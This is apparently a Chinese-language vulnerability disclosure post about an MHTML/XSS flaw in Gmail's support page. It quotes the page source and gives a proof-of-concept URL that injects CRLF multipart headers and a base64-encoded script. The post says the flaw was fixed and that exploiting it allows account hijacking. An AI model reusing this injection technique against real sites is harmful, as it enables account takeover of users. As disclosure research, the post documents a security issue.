Gmail Xss漏洞可以导致用户被劫持

漏洞详情

简要描述:

Google最近悄悄修复了Gmail中存在一个严重的xss问题,可能导致劫持用户的账户

详细说明:

 

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="zh-Hans">

<head>

<script type="text/javascript">serverResponseTimeDelta=window.external&&window.external.pageT?window.external.pageT:-1;pageStartTime=new Date().getTime();</script>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>与我们联系 - Gmail帮助</title>

<meta name="google-site-verification"

content="l0nCskQHeO/C11y6qeq7ngDGZ0QVdN1hX7F4SGj3PHg=" />

<link rel="icon" href="//www.google.com/favicon.ico" />

<link rel="stylesheet" type="text/css" href="http://mail.google.com/support/bin/resource/all.css?v=261_7" />

<script type="text/javascript">

var internal = 0;

var hc_protocol = "http://";

var hc_page_info = "request";

var country = 'CN';

var countryGroup = 'JAPAC';

var autoExpand = '';

var global_error_general = "很抱歉,我们无法提交您的信息。请重试。";

var hc_urchin = "UA-18500-28";

var global_hc_bookmark = new Array("add","remove","toggle");

global_hc_bookmark.add = new Array();

global_hc_bookmark.remove = new Array();

global_hc_bookmark.toggle = new Array();

global_hc_bookmark["add"].url = "";

问题存在于

var hc_page_info = "request";

的可控,满足mhtml漏洞的利用条件

http://mail.google.com/support/bin/request.py?contact_type=contact_policy%0dContent-Type%3Amultipart/related%3Bboundary%3Dx--x%0DContent-Location%3Ax%0DContent-Transfer-Encoding%3Abase64%0d%0dPHNjcmlwdD5hbGVydCgnZ21haWwgMGRheSB0ZXN0IGJ5ID8/PycpPC9zY3JpcHQ%2B%--x!x

成功执行javascript之后,即可对gmail邮箱执行任何操作,之前已经有相应的一些case披露

http://www.wooyun.org/bugs/wooyun-2010-01199
发表评论?

0 条评论。

发表评论